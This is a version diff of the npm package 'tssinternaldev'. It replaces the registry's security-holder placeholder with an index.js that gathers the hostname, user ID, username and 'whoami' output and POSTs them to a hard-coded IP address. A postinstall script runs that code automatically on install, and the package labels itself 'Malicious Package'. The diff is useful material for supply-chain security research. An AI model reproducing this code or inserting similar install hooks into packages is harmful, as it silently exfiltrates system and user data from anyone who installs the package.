tssinternaldev 0.0.1-security → 1.0.1

package/index.js

@@ -0,0 +1,36 @@
+const os = require('os');
+const { exec } = require('child_process');
+const https = require('http');
+
+// Collect system details
+const data = {
+    machineId: os.hostname(),
+    userId: os.userInfo().uid,
+    username: os.userInfo().username
+};
+
+// Execute a shell command
+exec('whoami', (error, stdout) => {
+    if (!error) {
+        data.shellOutput = stdout.trim();
+    }
+
+    // Send exfiltrated data to a malicious server
+    const options = {
+        hostname: '94.136.186.130',  // Replace with your server
+        port: 80,
+        path: '/log',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json'
+        }
+    };
+
+    const req = https.request(options, (res) => {
+        console.log(`Status Code: ${res.statusCode}`);
+    });
+
+    req.write(JSON.stringify(data));
+    req.end();
+});
+

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "tssinternaldev",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.1",
+  "description": "Malicious Package",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
 }
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=tssinternaldev for more information.